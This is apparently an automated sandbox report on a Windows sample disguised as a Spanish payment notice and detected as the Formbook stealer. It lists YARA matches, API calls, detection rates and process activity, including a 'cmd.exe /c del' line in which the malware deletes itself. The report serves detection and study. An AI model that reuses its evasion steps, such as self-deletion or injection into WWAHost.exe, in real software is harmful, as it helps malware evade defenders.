          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_02F1C7540_2_02F1C754
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_02F1EB980_2_02F1EB98
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_02F1EB880_2_02F1EB88
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_076A21130_2_076A2113
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_076A4F580_2_076A4F58
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_076A5CA80_2_076A5CA8
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_076A9AE00_2_076A9AE0
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_004010308_2_00401030
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041E1AE8_2_0041E1AE
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0040926C8_2_0040926C
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_004092708_2_00409270
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041DBB28_2_0041DBB2
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0040DC108_2_0040DC10
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00402D888_2_00402D88
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00402D908_2_00402D90
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041DEF48_2_0041DEF4
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00402FB08_2_00402FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398EBB014_2_0398EBB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1DBD214_2_03A1DBD2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A22B2814_2_03A22B28
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A222AE14_2_03A222AE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395F90014_2_0395F900
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397412014_2_03974120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396B09014_2_0396B090
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A220A814_2_03A220A8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039820A014_2_039820A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A228EC14_2_03A228EC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2E82414_2_03A2E824
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1100214_2_03A11002
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A21FF114_2_03A21FF1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A22EF714_2_03A22EF7
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03976E3014_2_03976E30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1D61614_2_03A1D616
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398258114_2_03982581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396D5E014_2_0396D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A225DD14_2_03A225DD
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A22D0714_2_03A22D07
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03950D2014_2_03950D20
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A21D5514_2_03A21D55
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396841F14_2_0396841F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1D46614_2_03A1D466
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A6926C14_2_00A6926C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A6927014_2_00A69270
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7DBB214_2_00A7DBB2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A6DC1014_2_00A6DC10
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A62D8814_2_00A62D88
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A62D9014_2_00A62D90
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7DEF314_2_00A7DEF3
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A62FB014_2_00A62FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0395B150 appears 35 times
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A310 NtCreateFile,8_2_0041A310
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A3C0 NtReadFile,8_2_0041A3C0
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A440 NtClose,8_2_0041A440
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A4F0 NtAllocateVirtualMemory,8_2_0041A4F0
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A362 NtCreateFile,8_2_0041A362
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A30A NtCreateFile,8_2_0041A30A
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A3BA NtReadFile,8_2_0041A3BA
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A43B NtClose,8_2_0041A43B
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A4EA NtAllocateVirtualMemory,8_2_0041A4EA
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A4F4 NtAllocateVirtualMemory,8_2_0041A4F4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A50 NtCreateFile,LdrInitializeThunk,14_2_03999A50
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039999A0 NtCreateSection,LdrInitializeThunk,14_2_039999A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_03999910
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999840 NtDelayExecution,LdrInitializeThunk,14_2_03999840
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999860 NtQuerySystemInformation,LdrInitializeThunk,14_2_03999860
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999780 NtMapViewOfSection,LdrInitializeThunk,14_2_03999780
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999FE0 NtCreateMutant,LdrInitializeThunk,14_2_03999FE0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999710 NtQueryInformationToken,LdrInitializeThunk,14_2_03999710
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039996D0 NtCreateKey,LdrInitializeThunk,14_2_039996D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039996E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_039996E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999650 NtQueryValueKey,LdrInitializeThunk,14_2_03999650
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999660 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_03999660
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039995D0 NtClose,LdrInitializeThunk,14_2_039995D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999540 NtReadFile,LdrInitializeThunk,14_2_03999540
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399A3B0 NtGetContextThread,14_2_0399A3B0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999B00 NtSetValueKey,14_2_03999B00
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A80 NtOpenDirectoryObject,14_2_03999A80
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A10 NtQuerySection,14_2_03999A10
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A00 NtProtectVirtualMemory,14_2_03999A00
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A20 NtResumeThread,14_2_03999A20
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039999D0 NtCreateProcessEx,14_2_039999D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999950 NtQueueApcThread,14_2_03999950
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039998A0 NtWriteVirtualMemory,14_2_039998A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039998F0 NtReadVirtualMemory,14_2_039998F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999820 NtEnumerateKey,14_2_03999820
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399B040 NtSuspendThread,14_2_0399B040
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039997A0 NtUnmapViewOfSection,14_2_039997A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399A710 NtOpenProcessToken,14_2_0399A710
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999730 NtQueryVirtualMemory,14_2_03999730
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399A770 NtOpenThread,14_2_0399A770
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999770 NtSetInformationFile,14_2_03999770
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999760 NtOpenProcess,14_2_03999760
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999610 NtEnumerateValueKey,14_2_03999610
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999670 NtQueryInformationProcess,14_2_03999670
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039995F0 NtQueryInformationFile,14_2_039995F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399AD30 NtSetContextThread,14_2_0399AD30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999520 NtWaitForSingleObject,14_2_03999520
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999560 NtWriteFile,14_2_03999560
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A3C0 NtReadFile,14_2_00A7A3C0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A310 NtCreateFile,14_2_00A7A310
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A4F0 NtAllocateVirtualMemory,14_2_00A7A4F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A440 NtClose,14_2_00A7A440
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A3BA NtReadFile,14_2_00A7A3BA
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A30A NtCreateFile,14_2_00A7A30A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A362 NtCreateFile,14_2_00A7A362
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A4EA NtAllocateVirtualMemory,14_2_00A7A4EA
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A4F4 NtAllocateVirtualMemory,14_2_00A7A4F4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A43B NtClose,14_2_00A7A43B
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.314207449.0000000007930000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.308434377.0000000000C16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFormatExcept.exeF vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000000.303233250.0000000000E96000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFormatExcept.exeF vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000003.381717233.00000000039B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000002.385915801.0000000001CFF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386824949.00000000038D6000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000003.306954207.0000000001830000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000003.308930393.00000000019D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exeBinary or memory string: OriginalFilenameFormatExcept.exeF vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Notificaci#U00f3n de pago.exeVirustotal: Detection: 21%
          Source: Notificaci#U00f3n de pago.exeReversingLabs: Detection: 41%
          Source: Notificaci#U00f3n de pago.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess created: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess created: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Notificaci#U00f3n de pago.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@6/3
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
